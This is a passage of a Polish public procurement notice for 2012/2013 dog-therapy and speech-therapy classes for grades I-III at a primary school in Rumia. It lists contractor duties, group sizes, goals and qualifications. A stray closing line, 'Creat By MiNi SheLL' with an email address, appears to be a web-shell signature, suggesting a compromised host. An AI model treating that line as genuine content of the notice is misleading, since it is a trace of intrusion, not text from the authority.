4) diagnozą i analizą potrzeb uczniów klas I-III szkół podstawowych biorących udział                    w projekcie, przeprowadzaną przez powołany do tego celu szkolny zespół nauczycieli                      i dostępną w danej szkole,

4. Wykonawca/wykonawczyni zobowiązany/na będzie do prowadzenia dzienników zajęć dodatkowych zgodnie z obowiązującymi przepisami.

5. Wykonawca/wykonawczyni zobowiązany/zobowiązana będzie do wspomagania promocji                  i ewaluacji projektu - informowanie o współfinansowaniu Projektu i niniejszej umowy ze środków Europejskiego Funduszu Społecznego oraz współpracy z Koordynatorem Projektu w mierzeniu postępów uczniów i uczennic w zakresie rezultatów Projektu.
6.Wykonawca/wykonawczyni będzie dokonywał/ła ewaluacji pracy dla zajęć pozalekcyjnych oraz dokonywał/ła ewaluacji osiągnięć rozwojowych ucznia/uczennicy (Beneficjentów Ostatecznych) pod kątem rozwoju postaw, umiejętności i poziomu wiedzy, w tym w zakresie rezultatów wskazanych  w Projekcie.

7.Wykonawca/Wykonawczyni będzie ponosił/ła odpowiedzialność materialną za powierzone mienie tj. materiały i pomoce dydaktyczne udostępnione do prowadzenia zajęć. Zajęcia prowadzone przez Wykonawcę/Wykonawczynię winny uwzględniać zastosowanie powyższych pomocy dydaktycznych w jak największym stopniu, o ile charakter danego rodzaju zajęć umożliwia                   i uzasadnia ich stosowanie.

8.Wykonawca/Wykonawczyni ma obowiązek prowadzenia zajęć metodami aktywizującymi                  z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych.

9.W przypadku niemożności prowadzenia usługi edukacyjnej Wykonawca/Wykonawczyni będzie miał obowiązek we własnym zakresie przedstawić zastępstwo osoby o wymaganych                              w postępowaniu w danej części kwalifikacjach, po wcześniejszym pisemnych poinformowaniu                 o zaistniałej sytuacji Koordynatora Projektu i uzyskaniu jego zgody.

10. W celach rozliczeniowych Zamawiający przyjął, że godzina zajęć edukacyjnych rozwijających uzdolnienia i dydaktyczno - wyrównawczych trwa 45 minut, a zajęć specjalistycznych  - 60 minut.  W uzasadnionych przypadkach dopuszcza się prowadzenie zajęć specjalistycznych w krótszym czasie niż 60 minut, zachowując ustalony dla ucznia łączny czas tych zajęć. 

11. Zgodnie z zachowaniem zasady gender każdorazowo, gdy jest mowa o uczniach ma się  na myśli uczniów i uczennice. Natomiast, gdy mówi się o Wykonawcy  - chodzi o Wykonawcę, Wykonawczynię bądź  przedsiębiorstwo. 

W RAMACH PRZEDMIOTU ZAMÓWIENIA WYODRĘBNIONO NASTĘPUJĄCE ZADANIA:

Zadanie Nr 3: Usługa edukacyjna dla uczniów klas I-III Szkoły Podstawowej Nr 6 w Rumi,        ul. Sienkiewicza 30; 84-230 Rumia - organizacja i prowadzenie w roku szkolnym 2012/2013
zajęć socjoterapeutycznych - dogoterapia w łącznej liczbie godzin 160.

Elementy składowe zadania:
1) organizacja i prowadzenie w roku szkolnym 2012/2013 zajęć socjoterapeutycznych  - dogoterapia w łącznej liczbie godzin 40 - psycholog,
2) organizacja i prowadzenie w roku szkolnym 2012/2013 zajęć socjoterapeutycznych  - dogoterapia w łącznej liczbie godzin 120 - dogoterapeuta, posiadający psa, który jest przygotowany do pracy terapeutycznej z dziećmi oraz zorganizowanie transportu psa na zajęcia.

Opis zajęć: 
- zajęcia będą obejmowały uczniów klas I - III,
- zajęcia dla dzieci niepełnosprawnych i dla dzieci z zaburzeniem w zachowaniu,
- zajęcia odbywać się będą w formie terapii z psem,
- zajęcia będą prowadzone w trzech grupach z których, każda będzie liczyła po 8 uczniów- razem 24 uczniów,
- zajęcia każdej grupy będą odbywały się co najmniej 1 raz w tygodniu, po uzgodnieniu szczegółowego harmonogramu z Koordynatorem Szkolnym.

Zadanie 3.1 Usługa edukacyjna dla uczniów klas I-III Szkoły Podstawowej Nr 6 w Rumi,                      ul. Sienkiewicza 30; 84-230 Rumia - organizacja i prowadzenie w roku szkolnym  2012/2013  zajęć socjoterapeutycznych - dogoterapia w łącznej liczbie godzin 40.

Opis zajęć:
-zajęcia będą obejmowały uczniów klas I - III,
- zajęcia dla dzieci niepełnosprawnych i dla dzieci z zaburzeniem w zachowaniu,
- zajęcia odbywać się będą w formie terapii z psem, 
- zajęcia będą prowadzone w 1 grupie, która będzie liczyła po 8 uczniów 
- zajęcia będą odbywały się co najmniej 1 raz w tygodniu, po uzgodnieniu szczegółowego harmonogramu z Koordynatorem Szkolnym.

Cel zajęć:
- rozwijanie sfery umysłowej dzieci, ćwiczenie koncentracji uwagi, pobudzanie zmysłu: wzroku, słuchu, dotyku i węchu, kształcenie umiejętności komunikacyjnych, rozwijanie umiejętności związanych z określaniem związków przyczynowo - skutkowych, rozpoznawaniem kolorów               i kształtów, spostrzeganiem różnic  i podobieństw.

Oczekiwane efekty:
- rozwój umiejętności komunikacyjnych,
- poprawa sprawności psychomotorycznej dziecka,
- poprawa koncentracji i uwagi,
-  rozwój sfery umysłowej dzieci, 
- rozwój zmysłu: wzroku, słuchu, dotyku i węchu, 
- rozwój umiejętności związanych z określaniem związków przyczynowo - skutkowych.

Minimalne warunki udziału w postępowaniu: 
- wykształcenie wyższe o  kierunku psychologia,
- co najmniej 6 miesięczne doświadczenie w pracy z dziećmi niepełnosprawnymi, 
- możliwość codziennego kontaktu z rodzicami i wychowawcami podopiecznych,
- codzienna dyspozycyjność do prowadzenia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3.2: Organizacja i prowadzenie w roku szkolnym 2012/2013 w   Szkole Podstawowej nr 6 w Rumi zajęć 
                                socjoterapeutycznych -  dogoterapia  w łącznej liczbie godzin 120 - dogoterapeuta oraz koszty transportu psów na 
                                 zajęcia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS  PRZEDMIOTU ZAMÓWIENIA 

1.Przedmiotem zamówienia jest organizacja i prowadzenie zajęć dodatkowych w czterech szkołach podstawowych Gminy  Miejskiej Rumia w roku szkolnym 2012/2013 w ramach projektu Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działania: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic               w jakości usług edukacyjnych - projekty systemowe - postępowanie uzupełniające II.

2.Projekt ma na celu przede wszystkim wsparcie indywidualnego rozwoju uczniów i uczennic klas I-III poprzez dostosowanie wsparcia do ich indywidualnych potrzeb zdiagnozowanych w okresie realizacji projektu 2011-2013. 

3.Wybrany Wykonawca/wykonawczyni powinien/powinna zapoznać się z następującymi dokumentami:

1) wnioskiem o dofinansowanie projektu  Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia,

2) zasadami przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organy prowadzące szkoły w ramach Programu Operacyjnego Kapitał Ludzki: http://defs.pomorskie.eu/pl/projekty_systemowe/priorytet_ix/klasy_1_3/dokumenty,

3) dokumentacją konkursową Programu Operacyjnego Kapitał Ludzki Priorytet IX, Działanie 9.1 Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych - projekty systemowe: www.defs.pomorskie.eu/pl,

4) diagnozą i analizą potrzeb uczniów klas I-III szkół podstawowych biorących udział                    w projekcie, przeprowadzaną przez powołany do tego celu szkolny zespół nauczycieli                      i dostępną w danej szkole,

4. Wykonawca/wykonawczyni zobowiązany/na będzie do prowadzenia dzienników zajęć dodatkowych zgodnie z obowiązującymi przepisami.

5. Wykonawca/wykonawczyni zobowiązany/zobowiązana będzie do wspomagania promocji                  i ewaluacji projektu - informowanie o współfinansowaniu Projektu i niniejszej umowy ze środków Europejskiego Funduszu Społecznego oraz współpracy z Koordynatorem Projektu w mierzeniu postępów uczniów i uczennic w zakresie rezultatów Projektu.
6.Wykonawca/wykonawczyni będzie dokonywał/ła ewaluacji pracy dla zajęć pozalekcyjnych oraz dokonywał/ła ewaluacji osiągnięć rozwojowych ucznia/uczennicy (Beneficjentów Ostatecznych) pod kątem rozwoju postaw, umiejętności i poziomu wiedzy, w tym w zakresie rezultatów wskazanych  w Projekcie.

7.Wykonawca/Wykonawczyni będzie ponosił/ła odpowiedzialność materialną za powierzone mienie tj. materiały i pomoce dydaktyczne udostępnione do prowadzenia zajęć. Zajęcia prowadzone przez Wykonawcę/Wykonawczynię winny uwzględniać zastosowanie powyższych pomocy dydaktycznych w jak największym stopniu, o ile charakter danego rodzaju zajęć umożliwia                   i uzasadnia ich stosowanie.

8.Wykonawca/Wykonawczyni ma obowiązek prowadzenia zajęć metodami aktywizującymi                  z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych.

9.W przypadku niemożności prowadzenia usługi edukacyjnej Wykonawca/Wykonawczyni będzie miał obowiązek we własnym zakresie przedstawić zastępstwo osoby o wymaganych                              w postępowaniu w danej części kwalifikacjach, po wcześniejszym pisemnych poinformowaniu                 o zaistniałej sytuacji Koordynatora Projektu i uzyskaniu jego zgody.

10. W celach rozliczeniowych Zamawiający przyjął, że godzina zajęć edukacyjnych rozwijających uzdolnienia i dydaktyczno - wyrównawczych trwa 45 minut, a zajęć specjalistycznych  - 60 minut.  W uzasadnionych przypadkach dopuszcza się prowadzenie zajęć specjalistycznych w krótszym czasie niż 60 minut, zachowując ustalony dla ucznia łączny czas tych zajęć. 

11. Zgodnie z zachowaniem zasady gender każdorazowo, gdy jest mowa o uczniach ma się  na myśli uczniów i uczennice. Natomiast, gdy mówi się o Wykonawcy  - chodzi o Wykonawcę, Wykonawczynię bądź  przedsiębiorstwo. 

W RAMACH PRZEDMIOTU ZAMÓWIENIA WYODRĘBNIONO NASTĘPUJĄCE ZADANIA:

Zadanie Nr 3: Usługa edukacyjna dla uczniów klas I-III Szkoły Podstawowej Nr 6 w Rumi,        ul. Sienkiewicza 30; 84-230 Rumia - organizacja i prowadzenie w roku szkolnym 2012/2013
zajęć socjoterapeutycznych - dogoterapia w łącznej liczbie godzin 160.

Elementy składowe zadania:
1) organizacja i prowadzenie w roku szkolnym 2012/2013 zajęć socjoterapeutycznych  - dogoterapia w łącznej liczbie godzin 40 - psycholog,
2) organizacja i prowadzenie w roku szkolnym 2012/2013 zajęć socjoterapeutycznych  - dogoterapia w łącznej liczbie godzin 120 - dogoterapeuta, posiadający psa, który jest przygotowany do pracy terapeutycznej z dziećmi oraz zorganizowanie transportu psa na zajęcia.

Opis zajęć: 
- zajęcia będą obejmowały uczniów klas I - III,
- zajęcia dla dzieci niepełnosprawnych i dla dzieci z zaburzeniem w zachowaniu,
- zajęcia odbywać się będą w formie terapii z psem,
- zajęcia będą prowadzone w trzech grupach z których, każda będzie liczyła po 8 uczniów- razem 24 uczniów,
- zajęcia każdej grupy będą odbywały się co najmniej 1 raz w tygodniu, po uzgodnieniu szczegółowego harmonogramu z Koordynatorem Szkolnym.
Zadanie 3.2 prowadzenie w roku szkolnym 2012/2013 zajęć socjoterapeutycznych - dogoterapia oraz koszty transportu psów na zajęcia -  w łącznej liczbie godzin 120.

    Zajęcia poprowadzi co najmniej 1 dogoterapeuta, posiadający psa, który jest przygotowany do pracy terapeutycznej z dziećmi w łącznej liczbie godzin 120. Integralną częścią zadania jest  zorganizowanie transportu psa na zajęcia. Koszt transportu psa należy wyszczególnić  w formularzu ofertowym jako dodatkową pozycję w kalkulacji kosztów usługi edukacyjnej.
Opis zajęć: 
-zajęcia będą obejmowały uczniów klas I - III,
- zajęcia dla dzieci niepełnosprawnych i dla dzieci z zaburzeniem w zachowaniu,
- zajęcia odbywać się będą w formie terapii z psem, 
- zajęcia będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów- razem 16 uczniów,
- zajęcia każdej grupy będą odbywały się co najmniej 1 raz w tygodniu, po uzgodnieniu szczegółowego harmonogramu z Koordynatorem Szkolnym.

Cel zajęć:
- rozwijanie sfery umysłowej dzieci, ćwiczenie koncentracji uwagi, pobudzanie zmysłu: wzroku, słuchu, dotyku i węchu, kształcenie umiejętności komunikacyjnych, rozwijanie umiejętności związanych z określaniem związków przyczynowo - skutkowych, rozpoznawaniem kolorów                  i kształtów, spostrzeganiem różnic i podobieństw.

Oczekiwane efekty:
- rozwój umiejętności komunikacyjnych,
- poprawa sprawności psychomotorycznej dziecka,
- poprawa koncentracji i uwagi,
-  rozwój sfery umysłowej dzieci, 
- rozwój zmysłu: wzroku, słuchu, dotyku i węchu, 
- rozwój umiejętności związanych z określaniem związków przyczynowo- skutkowych.

Minimalne warunki udziału w postępowaniu: 
- licencja dogoterapeuty lub ukończone szkolenie uprawniające do wykonywania pracy jako dogoterapeuta lub równoważne,
- posiadanie  psa, który jest przygotowany do pracy terapeutycznej z dziećmi, 
- co najmniej 6 miesięczne doświadczenie w pracy z dziećmi niepełnosprawnymi,
 - posiadanie aktualnego ubezpieczenie psa (OC),
- posiadanie paszportu psa z aktualnymi badaniami,
- możliwość codziennego kontaktu z rodzicami i wychowawcami podopiecznych,
- codzienna dyspozycyjność do prowadzenia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 5: Organizacja i prowadzenie w roku szkolnym 2012/2013 w   Szkole Podstawowej nr 6 w Rumi zajęć logopedycznych 
                                dla dzieci z zaburzeniami rozwoju mowy w łącznej liczbie godzin 60..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS  PRZEDMIOTU ZAMÓWIENIA 1.Przedmiotem zamówienia jest organizacja i prowadzenie zajęć dodatkowych w czterech szkołach podstawowych Gminy  Miejskiej Rumia w roku szkolnym 2012/2013 w ramach projektu Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działania: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic               w jakości usług edukacyjnych - projekty systemowe - postępowanie uzupełniające II.

2.Projekt ma na celu przede wszystkim wsparcie indywidualnego rozwoju uczniów i uczennic klas I-III poprzez dostosowanie wsparcia do ich indywidualnych potrzeb zdiagnozowanych w okresie realizacji projektu 2011-2013. 

3.Wybrany Wykonawca/wykonawczyni powinien/powinna zapoznać się z następującymi dokumentami:

1) wnioskiem o dofinansowanie projektu  Fundamenty przyszłości - wyrównywanie szans edukacyjno-rozwojowych uczniów klas I-III czterech szkół podstawowych w Gminie Miejskiej Rumia,

2) zasadami przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organy prowadzące szkoły w ramach Programu Operacyjnego Kapitał Ludzki: http://defs.pomorskie.eu/pl/projekty_systemowe/priorytet_ix/klasy_1_3/dokumenty,

3) dokumentacją konkursową Programu Operacyjnego Kapitał Ludzki Priorytet IX, Działanie 9.1 Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych - projekty systemowe: www.defs.pomorskie.eu/pl,

4) diagnozą i analizą potrzeb uczniów klas I-III szkół podstawowych biorących udział                    w projekcie, przeprowadzaną przez powołany do tego celu szkolny zespół nauczycieli                      i dostępną w danej szkole,

4. Wykonawca/wykonawczyni zobowiązany/na będzie do prowadzenia dzienników zajęć dodatkowych zgodnie z obowiązującymi przepisami.

5. Wykonawca/wykonawczyni zobowiązany/zobowiązana będzie do wspomagania promocji                  i ewaluacji projektu - informowanie o współfinansowaniu Projektu i niniejszej umowy ze środków Europejskiego Funduszu Społecznego oraz współpracy z Koordynatorem Projektu w mierzeniu postępów uczniów i uczennic w zakresie rezultatów Projektu.
6.Wykonawca/wykonawczyni będzie dokonywał/ła ewaluacji pracy dla zajęć pozalekcyjnych oraz dokonywał/ła ewaluacji osiągnięć rozwojowych ucznia/uczennicy (Beneficjentów Ostatecznych) pod kątem rozwoju postaw, umiejętności i poziomu wiedzy, w tym w zakresie rezultatów wskazanych  w Projekcie.

7.Wykonawca/Wykonawczyni będzie ponosił/ła odpowiedzialność materialną za powierzone mienie tj. materiały i pomoce dydaktyczne udostępnione do prowadzenia zajęć. Zajęcia prowadzone przez Wykonawcę/Wykonawczynię winny uwzględniać zastosowanie powyższych pomocy dydaktycznych w jak największym stopniu, o ile charakter danego rodzaju zajęć umożliwia                   i uzasadnia ich stosowanie.

8.Wykonawca/Wykonawczyni ma obowiązek prowadzenia zajęć metodami aktywizującymi                  z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych.

9.W przypadku niemożności prowadzenia usługi edukacyjnej Wykonawca/Wykonawczyni będzie miał obowiązek we własnym zakresie przedstawić zastępstwo osoby o wymaganych                              w postępowaniu w danej części kwalifikacjach, po wcześniejszym pisemnych poinformowaniu                 o zaistniałej sytuacji Koordynatora Projektu i uzyskaniu jego zgody.

10. W celach rozliczeniowych Zamawiający przyjął, że godzina zajęć edukacyjnych rozwijających uzdolnienia i dydaktyczno - wyrównawczych trwa 45 minut, a zajęć specjalistycznych  - 60 minut.  W uzasadnionych przypadkach dopuszcza się prowadzenie zajęć specjalistycznych w krótszym czasie niż 60 minut, zachowując ustalony dla ucznia łączny czas tych zajęć. 

11. Zgodnie z zachowaniem zasady gender każdorazowo, gdy jest mowa o uczniach ma się  na myśli uczniów i uczennice. Natomiast, gdy mówi się o Wykonawcy  - chodzi o Wykonawcę, Wykonawczynię bądź  przedsiębiorstwo. 

W RAMACH PRZEDMIOTU ZAMÓWIENIA WYODRĘBNIONO NASTĘPUJĄCE ZADANIA:

Zadanie Nr 5: Usługa edukacyjna dla uczniów klas I-III Szkoły Podstawowej Nr 6 w Rumi,            ul. Sienkiewicza 30; 84-230 Rumia - organizacja i prowadzenie w roku szkolnym 2012/2013 zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w łącznej liczbie godzin 60. 

Opis zajęć: 
- zajęcia będą obejmowały uczniów klas I - III, 
- zajęcia będą prowadzone w dwóch grupach z których, każda będzie liczyła po 4 uczniów - razem 8 uczniów,
- zajęcia każdej grupy będą odbywały się co najmniej 1 raz w tygodniu, po uzgodnieniu szczegółowego harmonogramu z Koordynatorem Szkolnym.
Cel zajęć: 
- profilaktyka logopedyczna dzieci w wieku szkolnym klas I-III w zakresie dostępu do wczesnej diagnozy i terapii logopedycznej (wczesne wykrycie ryzyka zaburzeń mowy, wad wymowy                     i podjęcie niezbędnych działań profilaktycznych),
- wspomaganie  prawidłowego rozwoju mowy dziecka i trwałe jej usprawnianie,
- wczesne podjęcie działań korygujących i profilaktycznych wobec dzieci przejawiających określone dysfunkcje w obrębie narządu żucia i aparatu oddechowego,
- objęcie systematyczną terapią logopedyczną dzieci wymagających pomocy w zakresie stwierdzonych zaburzeń i wad wymowy,
- usprawnianie procesu komunikacji językowej,
- wyrównywanie szans edukacyjnych dziecka,
- wzmacnianie wiary we własne możliwości, rozwijanie samoakceptacji i kształtowanie pozytywnej samooceny,
- zaangażowanie rodziców do świadomej współpracy nad rozwojem dzieci i kształtowaniem ich prawidłowej wymowy. 

Oczekiwane efekty:
- osiągnięcie przez dziecko sukcesu terapeutycznrgo w postaci poprawy stanu mowy, 
- nabycie umiejętność  pionizacji języka i usprawni aparat artykulacyjny, 
- nabycie umiejętność  prawidłowego oddychania  i połykania,
- nabycie umiejętności  sprawnego komunikowania się z otoczeniem, wyrażania swoich poglądy,
- poszerzenie zasobów słownictwa oraz rozwinięcie mowy opowieściowej.

Minimalne warunki udziału w postępowaniu: 
- wykształcenie wyższe pedagogiczne o specjalizacji logopedycznej lub wykształcenie wyższe logopedyczne lub ukończone studia podyplomowe z zakresu logopedii,
- posiadanie kwalifikacje uprawniające do prowadzenia zajęć z wykorzystaniem terapii zajęciowej oraz masażu leczniczego,
- posiadanie  co najmniej  6 miesięcznego doświadczenia w pracy z dziećmi w normie intelektualnej i niepełnosprawnymi w wieku wczesnoszkolnym (6-12 lat), 
- możliwość codziennego kontaktu z rodzicami i wychowawcami podopiecznych,
- codzienna dyspozycyjność do prowadzenia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com